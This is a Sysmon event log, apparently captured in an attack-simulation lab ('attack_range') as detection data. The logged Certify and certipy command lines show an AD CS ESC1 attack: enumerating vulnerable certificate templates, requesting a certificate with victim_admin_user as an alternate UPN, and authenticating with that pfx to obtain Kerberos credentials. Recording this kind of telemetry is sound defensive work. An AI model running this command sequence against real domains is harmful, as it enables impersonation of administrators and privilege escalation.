354300x80000000000000003206466Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.localKerberos2023-06-09 14:48:48.719{78198d03-3bcf-6483-8083-c60c00000000}8352C:\Users\attack_user\Desktop\Temp\certipy.exeattack_range\attack_usertcptruefalse192.168.1.10attack_pc.attack_range.local2411-false192.168.2.10dc.attack_range.local88kerberos
354300x80000000000000003206465Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.localKerberos2023-06-09 14:48:48.619{78198d03-3bcf-6483-8083-c60c00000000}8352C:\Users\attack_user\Desktop\Temp\certipy.exeattack_range\attack_usertcptruefalse192.168.1.10attack_pc.attack_range.local2410-false192.168.2.10dc.attack_range.local88kerberos
11241100x80000000000000003206464Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.localTesting2023-06-09 14:48:49.118{78198d03-3bcf-6483-8083-c60c00000000}8352C:\Users\attack_user\Desktop\Temp\certipy.exeC:\Users\attack_user\Desktop\Temp\victim_admin_user.ccache2023-06-09 14:38:01.005
154100x80000000000000003206448Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.local-2023-06-09 14:48:46.560{78198d03-3bcf-6483-8083-c60c00000000}8352C:\Users\attack_user\Desktop\Temp\certipy.exe-----certipy.exe auth -pfx victim_admin_user.pfx -username victim_admin_user -domain attack_range.localC:\Users\attack_user\Desktop\Temp\attack_range\attack_user{78198d03-3ad1-6483-0afa-bc0c00000000}0xcbcfa0a1HighMD5=7A7DC777AD1EB059A120F382155497CB,SHA256=21AD41408CA97A5F8830AC482686F4F3E5A85A35B93808DEBC542F48D68D8812,IMPHASH=BA5546933531FAFA869B1F86A4E2A959{78198d03-3ad1-6483-a9fd-bc0c00000000}5388C:\Windows\System32\cmd.exe"C:\WINDOWS\system32\cmd.exe"
11241100x80000000000000003206447Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.localTesting2023-06-09 14:48:13.360{78198d03-3ba3-6483-71e3-c20c00000000}6908C:\Users\attack_user\Desktop\Temp\certipy.exeC:\Users\attack_user\Desktop\Temp\victim_admin_user.pfx2023-06-09 14:37:01.005
154100x80000000000000003206430Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.local-2023-06-09 14:48:03.222{78198d03-3ba3-6483-71e3-c20c00000000}6908C:\Users\attack_user\Desktop\Temp\certipy.exe-----certipy.exe req -u attack_user@attack_range.local -ca "Attack Range Cert Authority" -target cert_authority.attack_range.local -template "VulnerableTemplate_ESC1" -upn victim_admin_userC:\Users\attack_user\Desktop\Temp\attack_range\attack_user{78198d03-3ad1-6483-0afa-bc0c00000000}0xcbcfa0a1HighMD5=7A7DC777AD1EB059A120F382155497CB,SHA256=21AD41408CA97A5F8830AC482686F4F3E5A85A35B93808DEBC542F48D68D8812,IMPHASH=BA5546933531FAFA869B1F86A4E2A959{78198d03-3ad1-6483-a9fd-bc0c00000000}5388C:\Windows\System32\cmd.exe"C:\WINDOWS\system32\cmd.exe"
11241100x80000000000000003206426Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.localTesting2023-06-09 14:46:51.024{78198d03-3b4d-6483-e53e-c10c00000000}11192C:\Users\attack_user\Desktop\Temp\certipy.exeC:\Users\attack_user\Desktop\Temp\20230609104650_Certipy.json2023-06-09 14:46:51.024
11241100x80000000000000003206425Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.localTesting2023-06-09 14:46:51.024{78198d03-3b4d-6483-e53e-c10c00000000}11192C:\Users\attack_user\Desktop\Temp\certipy.exeC:\Users\attack_user\Desktop\Temp\20230609104650_Certipy.txt2023-06-09 14:46:51.024
11241100x80000000000000003206424Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.localTesting2023-06-09 14:46:50.482{78198d03-3b4d-6483-e53e-c10c00000000}11192C:\Users\attack_user\Desktop\Temp\certipy.exeC:\Users\attack_user\Desktop\Temp\20230609104650_templates.json2023-06-09 14:46:50.482
11241100x80000000000000003206423Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.localTesting2023-06-09 14:46:50.466{78198d03-3b4d-6483-e53e-c10c00000000}11192C:\Users\attack_user\Desktop\Temp\certipy.exeC:\Users\attack_user\Desktop\Temp\20230609104650_cas.json2023-06-09 14:46:50.466
11241100x80000000000000003206422Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.localTesting2023-06-09 14:46:50.466{78198d03-3b4d-6483-e53e-c10c00000000}11192C:\Users\attack_user\Desktop\Temp\certipy.exeC:\Users\attack_user\Desktop\Temp\20230609104650_Certipy.zip2023-06-09 14:46:50.466
154100x80000000000000003206406Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.local-2023-06-09 14:46:36.274{78198d03-3b4d-6483-e53e-c10c00000000}11192C:\Users\attack_user\Desktop\Temp\certipy.exe-----certipy.exe find -vulnerable -username attack_user@attack_range.localC:\Users\attack_user\Desktop\Temp\attack_range\attack_user{78198d03-3ad1-6483-0afa-bc0c00000000}0xcbcfa0a1HighMD5=7A7DC777AD1EB059A120F382155497CB,SHA256=21AD41408CA97A5F8830AC482686F4F3E5A85A35B93808DEBC542F48D68D8812,IMPHASH=BA5546933531FAFA869B1F86A4E2A959{78198d03-3ad1-6483-a9fd-bc0c00000000}5388C:\Windows\System32\cmd.exe"C:\WINDOWS\system32\cmd.exe"
11241100x80000000000000003206407Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.localTesting2023-06-09 14:32:29.024{78198d03-37dd-6483-0bba-a00c00000000}11820C:\Users\attack_user\Desktop\Temp\certipy.exeC:\Users\attack_user\Desktop\Temp\20230609103228_Certipy.json2023-06-09 14:46:33.024
11241100x80000000000000003206406Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.localTesting2023-06-09 14:32:29.024{78198d03-37dd-6483-0bba-a00c00000000}11820C:\Users\attack_user\Desktop\Temp\certipy.exeC:\Users\attack_user\Desktop\Temp\20230609103228_Certipy.txt2023-06-09 14:46:33.024
11241100x80000000000000003206405Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.localTesting2023-06-09 14:32:28.482{78198d03-37dd-6483-0bba-a00c00000000}11820C:\Users\attack_user\Desktop\Temp\certipy.exeC:\Users\attack_user\Desktop\Temp\20230609103228_templates.json2023-06-09 14:46:32.482
11241100x80000000000000003206404Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.localTesting2023-06-09 14:32:28.466{78198d03-37dd-6483-0bba-a00c00000000}11820C:\Users\attack_user\Desktop\Temp\certipy.exeC:\Users\attack_user\Desktop\Temp\20230609103228_cas.json2023-06-09 14:46:32.466
11241100x80000000000000003206403Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.localTesting2023-06-09 14:32:28.466{78198d03-37dd-6483-0bba-a00c00000000}11820C:\Users\attack_user\Desktop\Temp\certipy.exeC:\Users\attack_user\Desktop\Temp\20230609103228_Certipy.zip2023-06-09 14:46:32.466
154100x80000000000000003206068Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.local-2023-06-09 14:31:57.120{78198d03-37dd-6483-0bba-a00c00000000}11820C:\Users\attack_user\Desktop\Temp\certipy.exe-----certipy.exe find -username attack_user@attack_range.localC:\Users\attack_user\Desktop\Temp\attack_range\attack_user{78198d03-d21f-6480-255a-0b0000000000}0xb5a251MediumMD5=7A7DC777AD1EB059A120F382155497CB,SHA256=21AD41408CA97A5F8830AC482686F4F3E5A85A35B93808DEBC542F48D68D8812,IMPHASH=BA5546933531FAFA869B1F86A4E2A959{78198d03-34c7-6483-ce87-910c00000000}12196C:\Windows\System32\cmd.exe"C:\WINDOWS\system32\cmd.exe"
154100x80000000000000003206013Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.local-2023-06-09 14:27:01.920{78198d03-36b5-6483-0e83-980c00000000}5672C:\Users\attack_user\Desktop\Temp\Certify.exe1.0.0.0CertifyCertify-Certify.exeCertify.exe request /ca:"cert_authority.attack_range.local\Attack Range Cert Authority" /template:"VulnerableTemplate_ESC1" /altuser:victim_admin_userC:\Users\attack_user\Desktop\Temp\attack_range\attack_user{78198d03-d21f-6480-255a-0b0000000000}0xb5a251MediumMD5=C0552C81E78CDE0A3DB009DB32024FD7,SHA256=DB31650DC56C928D71F1EC0E8CBD6AE56849BF334D121F9BB9CE41090A23171D,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{78198d03-34c7-6483-ce87-910c00000000}12196C:\Windows\System32\cmd.exe"C:\WINDOWS\system32\cmd.exe"
154100x80000000000000003206009Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.local-2023-06-09 14:23:44.911{78198d03-35f0-6483-3e9c-950c00000000}5012C:\Users\attack_user\Desktop\Temp\Certify.exe1.0.0.0CertifyCertify-Certify.exeCertify.exe find /enrolleeSuppliesSubjectC:\Users\attack_user\Desktop\Temp\attack_range\attack_user{78198d03-d21f-6480-255a-0b0000000000}0xb5a251MediumMD5=C0552C81E78CDE0A3DB009DB32024FD7,SHA256=DB31650DC56C928D71F1EC0E8CBD6AE56849BF334D121F9BB9CE41090A23171D,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{78198d03-34c7-6483-ce87-910c00000000}12196C:\Windows\System32\cmd.exe"C:\WINDOWS\system32\cmd.exe"
154100x80000000000000003206008Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.local-2023-06-09 14:22:34.315{78198d03-35aa-6483-ecfe-930c00000000}17404C:\Users\attack_user\Desktop\Temp\Certify.exe1.0.0.0CertifyCertify-Certify.exeCertify.exe find /vulnerableC:\Users\attack_user\Desktop\Temp\attack_range\attack_user{78198d03-d21f-6480-255a-0b0000000000}0xb5a251MediumMD5=C0552C81E78CDE0A3DB009DB32024FD7,SHA256=DB31650DC56C928D71F1EC0E8CBD6AE56849BF334D121F9BB9CE41090A23171D,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{78198d03-34c7-6483-ce87-910c00000000}12196C:\Windows\System32\cmd.exe"C:\WINDOWS\system32\cmd.exe"
11241100x80000000000000003206007Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.localProcessHostingdotNETCode2023-06-09 14:21:33.518{78198d03-356d-6483-3c41-930c00000000}20144C:\Users\attack_user\Desktop\Temp\Certify.exeC:\Users\attack_user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Certify.exe.log2023-06-08 12:34:22.906
154100x80000000000000003206006Microsoft-Windows-Sysmon/Operationalattack_pc.attack_range.local-2023-06-09 14:21:33.490{78198d03-356d-6483-3c41-930c00000000}20144C:\Users\attack_user\Desktop\Temp\Certify.exe1.0.0.0CertifyCertify-Certify.exeCertify.exeC:\Users\attack_user\Desktop\Temp\attack_range\attack_user{78198d03-d21f-6480-255a-0b0000000000}0xb5a251MediumMD5=C0552C81E78CDE0A3DB009DB32024FD7,SHA256=DB31650DC56C928D71F1EC0E8CBD6AE56849BF334D121F9BB9CE41090A23171D,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{78198d03-34c7-6483-ce87-910c00000000}12196C:\Windows\System32\cmd.exe"C:\WINDOWS\system32\cmd.exe"